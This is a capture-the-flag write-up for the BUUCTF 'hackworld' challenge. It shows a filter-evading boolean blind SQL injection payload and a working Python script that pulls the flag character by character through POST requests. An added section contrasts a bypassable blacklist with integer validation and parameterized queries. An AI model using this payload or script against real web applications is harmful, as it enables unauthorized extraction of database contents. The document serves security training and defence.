buuctf [CISCN2019] hackworld

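The challenge filters many SQL characters, but I eventually found that blind injection still works, the same way as in the Geek Challenge FinalSQL injection. Here the challenge tells you the table name and the column name,
so you can enter the statement directly: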

1^(ascii(substr((select(flag)from(flag)),1,1))>1)^1

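Typing blind-injection probes by hand takes too long, so, building on the FinalSQL experience, write a script. Note that this is a POST request.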

Here is my humble script (the scripts I have seen from the experts are far more impressive):

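import requests
import time

# POST endpoint of the challenge instance
url = "http://f0c8caf0-fc27-454e-83bc-a557d1891b94.node3.buuoj.cn/index.php"
temp = {"id" : ""}
flag = ""
for i in range(1,1000):
    time.sleep(0.06)
    # Binary search over the printable ASCII range for the character at position i
    low = 32
    high =128
    mid = (low+high)//2
    while(low<high):
        temp["id"] = "1^(ascii(substr((select(flag)from(flag)),%d,1))>%d)^1" %(i,mid)
        r = requests.post(url,data=temp)
        print(low,high,mid,":")
        # "Hello" in the response means the comparison was true: the character code is greater than mid
        if "Hello" in r.text:
            low = mid+1
        else:
            high = mid
        mid =(low+high)//2
    # A result at the edge of the range means there is no character at this position, so stop
    if(mid ==32 or mid ==127):
        break
    flag +=chr(mid)
    print(flag)


print("flag=" ,flag)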
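
The defensive counterpart, as an added example that is not part of the original write-up or the challenge's code: a character blacklist lets the probe above through, while strict integer validation plus a bound parameter gives every probe the same empty answer. The blacklist rules, the sqlite3 stand-in database, the table rows and all function names are assumptions made for illustration.

```python
import re
import sqlite3

# Constructed blacklist standing in for the challenge's filter (its real rules are not on the page).
BLACKLIST = re.compile(r"\s|--|#|/\*|\b(?:union|and|or|sleep|benchmark)\b|[|&;']", re.I)

# The probe quoted in the write-up.
PAYLOAD = "1^(ascii(substr((select(flag)from(flag)),1,1))>1)^1"


def blacklist_allows(value: str) -> bool:
    """Weak control: accept anything that contains no blacklisted token."""
    return BLACKLIST.search(value) is None


def parse_id(value: str) -> int:
    """Strong control: the parameter is a row id, so accept 1-9 ASCII digits only."""
    if not re.fullmatch(r"[0-9]{1,9}", value):
        raise ValueError("id must be a decimal integer")
    return int(value)


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the application database (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, body TEXT)")
    db.execute("CREATE TABLE flag (flag TEXT)")
    db.execute("INSERT INTO posts VALUES (1, 'Hello (constructed row)')")
    db.execute("INSERT INTO flag VALUES ('flag{constructed}')")
    return db


def lookup(db: sqlite3.Connection, raw_id: str):
    """Hardened handler: validate first, then bind the value instead of concatenating it."""
    try:
        row_id = parse_id(raw_id)
    except ValueError:
        return None  # same response for every malformed id, so no true/false oracle
    row = db.execute("SELECT body FROM posts WHERE id = ?", (row_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("blacklist lets the probe through:", blacklist_allows(PAYLOAD))
    print("hardened lookup, id=1:", lookup(db, "1"))
    print("hardened lookup, probe:", lookup(db, PAYLOAD))
```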
